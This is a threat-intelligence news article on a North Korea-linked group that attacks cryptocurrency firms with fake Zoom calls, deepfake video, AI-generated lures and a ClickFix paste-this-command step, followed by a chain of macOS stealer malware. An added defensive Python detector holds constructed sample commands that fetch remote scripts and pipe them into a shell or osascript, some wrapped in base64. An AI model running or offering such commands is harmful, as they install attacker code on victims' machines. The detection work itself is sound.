
North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations

A threat actor with connections to North Korea, tracked as UNC1069, has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems, with the end goal of facilitating the theft of funds.

“The intervention relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, the ClickFix infection vector, and reportedly using an AI-generated video to trick the victim,” said Google Mandiant researchers Ross Inman and Adrian Hernandez.

UNC1069, which has been active since at least April 2018, has a history of running financially motivated social engineering campaigns that use fake meeting invitations and impersonate investors from reputable companies on Telegram. It is also tracked by the wider cybersecurity community under the monikers CryptoCore and MASAN.

In a report published last November, the Google Threat Intelligence Group (GTIG) documented the threat actor’s use of artificial intelligence (AI) generation tools such as Gemini to produce lures and other cryptocurrency-themed messages in support of its social engineering campaigns.

The group has also been seen attempting to abuse Gemini to generate cryptocurrency-stealing code, and using deepfake images and videos impersonating people in the cryptocurrency industry in campaigns that distribute a backdoor called BIGMACHO by passing it off as a Zoom software development kit (SDK).

“Since at least 2023, this group has moved away from phishing and traditional finance (TradFi) techniques targeting the Web3 industry, such as centralized exchanges (CEX), software developers in financial institutions, high-tech companies, and individuals in business finance,” Google said.

In a recent write-up from the tech giant’s threat intelligence division, UNC1069 is said to have deployed seven different malware families in a single intrusion, including several previously undocumented ones such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH.

It all starts when the threat actor approaches the victim via Telegram while posing as a venture capitalist, in a few cases even using the compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with the target.

The meeting link is designed to redirect the victim to a fake website impersonating Zoom (“zoom.uswe05[.]us”). In some cases, meeting links are shared directly in Telegram messages, often using Telegram’s hyperlink feature to mask the phishing URL behind innocuous link text.

Regardless of the method used, as soon as the victim clicks on the link, they are presented with a fake video call interface mimicking Zoom that urges them to enable their camera and enter their name. Once the target has joined the meeting, a screen resembling a real Zoom call, complete with video of the supposed other participants, is displayed.

However, those participant videos are suspected to be either deepfakes or real recordings secretly captured from earlier victims of the same scheme. It is worth noting that Kaspersky tracks a similar campaign under the name GhostCall, which it detailed in October 2025.

“Their webcam images were unwittingly recorded, then uploaded to attacker-controlled infrastructure, and used to trick other victims into believing they were participating in a real call,” the Russian security vendor said at the time. “When the video playback ended, the page switched to showing that user’s profile picture, maintaining the illusion of a live call.”

The attack then moves to the next stage, in which the victim is shown a fake error message about a supposed audio problem and instructed to copy and run a ClickFix-style “troubleshooting” command to fix it. On macOS, the command fetches and executes an AppleScript, which in turn downloads a malicious Mach-O binary to the system.

That binary, a C++ utility called WAVESHAPER, is designed to gather system information and drop a Go-based loader codenamed HYPERCALL, which is then used to deliver additional payloads:

  • A Golang backdoor tracked as HIDDENCALL, which provides hands-on-keyboard access to the compromised system and drops a Swift-based data stealer called DEEPBREATH.
  • A second C++ loader called SUGARLOADER, used to load CHROMEPUSH.
  • A small C/C++ backdoor called SILENCELIFT, which sends system information to the command-and-control (C2) server.
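The ClickFix step above is the one point in the chain where the victim types a command into their own terminal, so it is also the cheapest place to detect. The following is an added example (not code from Google, Mandiant, or the malware authors) of heuristic detection logic over process-execution telemetry: it flags commands that pipe a download or a base64-decoded stage into a shell or `osascript`, decodes embedded `echo … | base64 -d` stages so the second-stage command can be inspected too, and notes when the parent is an interactive terminal. The sample events, hostnames, and paths are constructed for illustration.

```python
"""Heuristic detection for macOS ClickFix-style "run this to fix your audio" commands.

Added example, not code from the article's sources. Events below are constructed to
resemble EDR process-execution records; hostnames/paths are placeholders.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass
class ProcExec:
    parent: str    # name of the parent process
    cmdline: str   # full command line as recorded by the sensor


# Interactive terminals a ClickFix lure would drive the victim to paste into.
INTERACTIVE_TERMINALS = {"Terminal", "iTerm2", "Warp", "Hyper"}

# `... | sh`, `... | bash`, `... | zsh`, `... | sudo bash`, `... | osascript`
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b|\|\s*osascript\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
DO_SHELL = re.compile(r"do shell script", re.IGNORECASE)
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# `echo <base64> | base64 -d` : capture the encoded stage so it can be decoded and re-scanned
ECHO_B64 = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)")

# Constructed sample: a second stage the lure hides behind base64 (placeholder host).
STAGE2 = "curl -fsSL https://zoom-fix.example.invalid/a.sh | sh"
B64_STAGE2 = base64.b64encode(STAGE2.encode()).decode()

SAMPLE_EVENTS = [
    # AppleScript one-liner that fetches a script and runs it (constructed)
    ProcExec("Terminal",
             "osascript -e 'do shell script \"curl -fsSL https://zoom-fix.example.invalid/fix.scpt "
             "-o /tmp/fix.scpt && osascript /tmp/fix.scpt\"'"),
    # base64-wrapped stage piped straight into bash (constructed)
    ProcExec("Terminal", f"bash -c 'echo {B64_STAGE2} | base64 -d | bash'"),
    # benign osascript use from a terminal
    ProcExec("Terminal", "osascript -e 'display dialog \"Build finished\"'"),
    # benign scheduled script, not launched by a user
    ProcExec("launchd", "/usr/bin/osascript /Users/alice/Scripts/backup.scpt"),
    ProcExec("Terminal", "git pull --rebase"),
]


def decoded_base64_stages(cmdline: str) -> list[str]:
    """Return the plaintext of any `echo <b64> | base64 -d` stages found in cmdline."""
    stages = []
    for m in ECHO_B64.finditer(cmdline):
        try:
            stages.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            pass  # not valid base64; ignore the fragment
    return stages


def score(event: ProcExec) -> list[str]:
    """Return the (sorted, de-duplicated) list of reasons this event looks like ClickFix."""
    reasons = set()
    # Inspect the visible command line and any decoded stages it carries.
    for text in [event.cmdline] + decoded_base64_stages(event.cmdline):
        if DOWNLOADER.search(text) and PIPE_TO_INTERPRETER.search(text):
            reasons.add("download piped to interpreter")
        if DO_SHELL.search(text) and DOWNLOADER.search(text):
            reasons.add("osascript 'do shell script' fetching remote content")
    if B64_DECODE.search(event.cmdline) and PIPE_TO_INTERPRETER.search(event.cmdline):
        reasons.add("base64 stage piped to interpreter")
    # The terminal parent only matters once something else already looks wrong.
    if reasons and event.parent in INTERACTIVE_TERMINALS:
        reasons.add("launched from an interactive terminal")
    return sorted(reasons)


def flag_events(events: list[ProcExec]) -> dict[str, list[str]]:
    """Map each suspicious command line to its reasons; benign events are omitted."""
    return {e.cmdline: r for e in events if (r := score(e))}


if __name__ == "__main__":
    for cmdline, reasons in flag_events(SAMPLE_EVENTS).items():
        print(cmdline)
        for r in reasons:
            print("   -", r)
```

On a real fleet this would run over the command-line field of process-start events rather than the constructed list, and the terminal-parent signal is what separates a pasted lure from the same pattern appearing in a CI script or an installer. The heuristics are deliberately narrow; treat a hit as a triage lead for the `/tmp` drop path and the fetched host, not as a verdict.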

DEEPBREATH abuses macOS’s Transparency, Consent, and Control (TCC) database to grant itself access to the file system, allowing it to steal iCloud Keychain data as well as data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes app.

Like DEEPBREATH, CHROMEPUSH also works as a data stealer, but it is written in C++ and deployed as a browser extension for Google Chrome and Brave that masquerades as an offline Google Docs editing tool. It also has the ability to record keystrokes, capture usernames and passwords, and extract browser cookies.

“The volume of tools deployed on a single host indicates a very serious effort to harvest credentials, browser data, and session tokens to facilitate financial theft,” Mandiant said. “While UNC1069 tends to target cryptocurrency startups, software developers, and large enterprise companies, the deployment of several new malware families alongside the popular downloader SUGARLOADER marks a significant increase in its power.”
